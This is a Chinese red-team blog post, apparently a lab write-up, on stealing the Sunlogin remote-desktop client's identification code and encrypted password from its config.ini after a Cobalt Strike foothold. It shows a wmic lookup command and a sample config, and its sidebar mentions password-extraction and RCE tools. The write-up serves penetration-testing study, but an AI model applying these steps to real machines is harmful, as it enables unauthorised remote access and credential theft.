读取向日葵配置信息攻击目标机

最新推荐文章于 2024-09-18 09:33:11 发布
最新推荐文章于 2024-09-18 09:33:11 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: WEB 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_fantasy/article/details/122403686
版权
本文介绍了如何本地搭建并模拟攻击向日葵客户端。通过查找安装路径下的config.ini文件,获取fastcode和encry_pwd字段,其中fastcode标识本机识别码,encry_pwd是加密的验证码。可以借助开源工具解密encry_pwd,并实现远程连接。
摘要由CSDN通过智能技术生成

一、本地搭建

准备好安装包,在安装的过程中可以看到默认的安装路径是C:\Program Files\Oray\SunLogin\SunloginClient

二、模拟攻击

首先上线CS

我这里本地就从自己得安装路径里找到config.ini的配置文件了,C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

如果安装路径做了修改可通过wmic process where processid=4580 get processid,executablepath,name命令进行查找

[base]
installautorun=
no_window_user_pwd=0
config_path=C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
tracksvr=
encry_pwd=j3fMbkkO1Xo=
macaddress=00:0C:29:66:95:D7
has_uu=0
showupdatetip=1
hostname=default
hostdesc=
level=
levelname=
levelchanel=
istransfer=
ismessage=
expires=
skin=
sunlogincode=
isfastcodelogin=1
logintype=0
license=4c9e-01cc-d914-1d36
licensepsw=
fastcode=k405776325
fastcodepsw=CujhXo9mn9eb5e3a5hmxKxLTNqAsy3Oa
sunloginserver=rc10-fc01.oray.com:443
slapiserver=slapi.oray.net
account=
language=0
first_run
最低0.47元/天 解锁文章
blue_fantasy
关注
专栏目录
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1338
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
Ms08067红队学员 “红蓝实战对抗”报告
Ms08067安全实验室
12-23 874
MS08067红队攻防从第二期班开始增加了“实战对抗”环节,为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境,将同学分为AB两队,一攻一守,实现既有攻击也要有防御更要有反制的全面内...
低版本向日葵识别码和验证码提取
crowsec
06-17 1万+
在很多场景中,拿到了Windows下的权限之后,可能由于杀软或者其他的情况下,无法登录目标PC,但是当目标的电脑中安装了向日葵的时候,可以通过读取向日葵识别码和验证码,直接登录。
读取配置文件并修改
开满向日葵的地方
12-01 1423
1. 读取某个文件夹下的Web.config中的appSection的节点,并修改保存Configuration config = WebConfigurationManager.OpenWebConfiguration("~/rmsms"); AppSettingsSection appSection = (AppSettingsSection)config.GetSec
向日葵密码提取+todesk密码提取工具-CMD版
最新发布
Dreambooks的博客
09-18 602
最新版本的todesk和向日葵已经无法从配置文件获取密码,而且常规的替换手法也已经失效。然后对指定pid的内存进行dump出来,使用二进制工具进行分析,就可以找到相关的密码。但是dump出来的文件大小都在几百M或者1G以上,就写了个工具实现自动化分析处理。通过学习别的师傅分享的思路,搞了个CMD下从内存获取密码的工具。
新版向日葵配置文件位置
qq_16709189的博客
09-15 3545
向日葵配置文件
【远程办公】使用向日葵远程控制配置过程记录
两水先木示的博客
11-03 1万+
向日葵智能硬件C1Pro 开启动配置过程,需配置2.4G网络wifi iPhone手可能连不上2.4G网络,只能连5G网络wifi的解决思路,还原网络设置。
解决向日葵解锁密码忘记的问题,HKEY_LOCAL_MACHINE\SOFTWARE \Oray\SunLogin下没有\Oray\SunLogin目录
热门推荐
cainiaojan的博客
10-09 4万+
1.多数的解决办法是这个,删除了然后重新安装 点击开始/运行-键入CMD回车-输入regedit回车,打开注册表,进入: 32位操作系统 HKEY_LOCAL_MACHINE\SOFTWARE \Oray\SunLogin,将SunLogin删除 64位操作系统 HKEY_LOCAL_MACHINE\SOFTWARE \Wow6432Node\Oray\SunLogin,将sunLogin删除 2.有些在上面一直找不到\Oray\SunLogin这个目录 可以尝试在HKEY_CURRENT_USER\SOF
Sunflower_get_Password
03-12
Sunflower_get_Password 一款针对向日葵的识别码和验证码提取工具 :female_sign:免责声明 由于传播,利用Sunflower_get_Password工具提供的功能而造成的任何直接或间接的后果及损失,均由使用者本人负责,本人不承担任何责任。 安装环境 本工具使用Python3语言开发 pip3 install unicorn 使用流程介绍 第一步:读取向日葵配置文件路径,分别提取config.ini参数里面encry_pwd(本验证码),fastcode(本识别码)[注意faskcode值第一个英文字母不要只需要后面数字即可]的值。 第二步:把ini参数里面encry_pwd值复制出来本直接运行SunDecrypt.py输入需要解密encry_pwd值即可输出解密后的值。 向日葵默认配置文件路径: 安装版本:C:\ Program Files \ Oray \ SunLo
红队作业 | 收集xxx.com域名的所有子域名
Ms08067安全实验室
01-10 4212
文章来源|MS08067 红队培训班 第5期本文作者:AlexD(红队培训班5期学员)按老师要求尝试完成布置的作业如下:被动信息收集0x01 利用DNS数据集收集子域 有很多第三方服务聚合...
渗透测试-网络攻防面试题(非常全面,根据自己经验所写,长期更新)
weixin_46626737的博客
01-03 1422
10)mssql,orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1)脏牛内核提权----------------------------------------------no----------------------------------------------
黑客登录你的windows电脑后会搜集的信息
2301_77315080的博客
08-12 306
黑客登录你的windows电脑后会搜集的信息
内网远程控制——向日葵
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
02-05 710
针对向日葵的话其实如果有本地安装的话,是有可能存在漏洞的。这里进行复现。
【渗透测试】Sunlogin-RCE(向日葵
SunnyCat
02-17 5373
版本:11.0.0.33.162 安装路径:C:\Program Files\Oray\SunLogin\SunloginClient 一、安装启动向日葵 二、RCE执行 xrkRce.exe -h 192.168.221.130 -t scan -p 1-65535 xrkRce.exe -h 192.168.221.130 -t rce -p 2913 -c “whoami” windows复现成功 苹果复现失败 2022.2.17 久违 ...
向日葵新版密码抓取
qq_39342001的博客
04-02 1265
向日葵新版密码抓取,必须dump内存,十六进制查找,新版不存在配置文件中。
破解向日葵id及密码横向移动
qq_64787896的博客
03-24 1451
3.进入C:\ProgramData\Oray\SunloginClientLite 的目录,查看Win12的向日葵的config.ini配置文件。将Sunflower_get_Password-main发送到kali,解压后进入用python3运行sun....py文件。4.读取config.in文件:type config.ini。1.用Viper上传向日葵软件(不用安装,可直接运行)将上面截图的encry_pwd的值输入,解密得到密码。2.msfconsole连接目标(Win12)
远程控制桌面软件向日葵 and todesk
qq_33031419的博客
05-29 1697
ToDesk远程控制软件-免费安全流畅的远程连接电脑手ubuntu安装todesk远程控制简明教程_todesk ubuntu安装_大熊の馨的博客-CSDN博客ubuntu安装向日葵_Major_xx的博客-CSDN博客
向日葵远程控制软件&MySQL5.7的安装与配置
2301_79278613的博客
01-02 1915
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS应用软件之一。 MySQL是一种关系型数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。 MySQL所使用的 SQL 语言是用于访问数据库的最常用标准化语言。
向日葵远程工具安装&Mysql5.7的安装与配置
2302_76705099的博客
01-01 1060
地址:https://sunlogin.oray.com/自己玩的话,就下载个人。
程序不读取nacos配置信息,只把resource
09-20
如果程序不读取Nacos配置信息,而只读取resource文件,那么可以采用以下步骤: 首先,将需要的配置信息保存在资源文件(如properties文件)中,例如命名为config.properties。在该文件中,可以定义各种配置项及其对应的值。 接下来,在程序中,通过以下步骤读取resource文件中的配置信息: 1. 创建一个Properties对象:Properties properties = new Properties(); 2. 使用ClassLoader加载resource文件:InputStream inputStream = getClass().getClassLoader().getResourceAsStream("config.properties"); 3. 使用Properties对象的load()方法加载配置文件:properties.load(inputStream); 4. 根据配置项的键获取对应的值:String value = properties.getProperty("key"); 使用上述步骤后,你就可以获取到resource文件中的配置信息。 需要注意的是,如果程序需要动态获取配置信息,可以通过定时或事件驱动的方式周期性地重新读取配置文件,以保证程序使用的配置信息是最新的。 另外,如果你希望使用Nacos作为配置中心,仍然可以将Nacos的配置信息导出到resource文件中,再通过上述步骤进行读取。这样的好处是可以在需要时灵活地切换配置中心,而无需修改程序代码。 综上所述,即使程序不读取Nacos配置信息,只读取resource文件,依然可以通过将配置信息保存在resource中,并通过编码读取resource文件实现程序对配置的使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值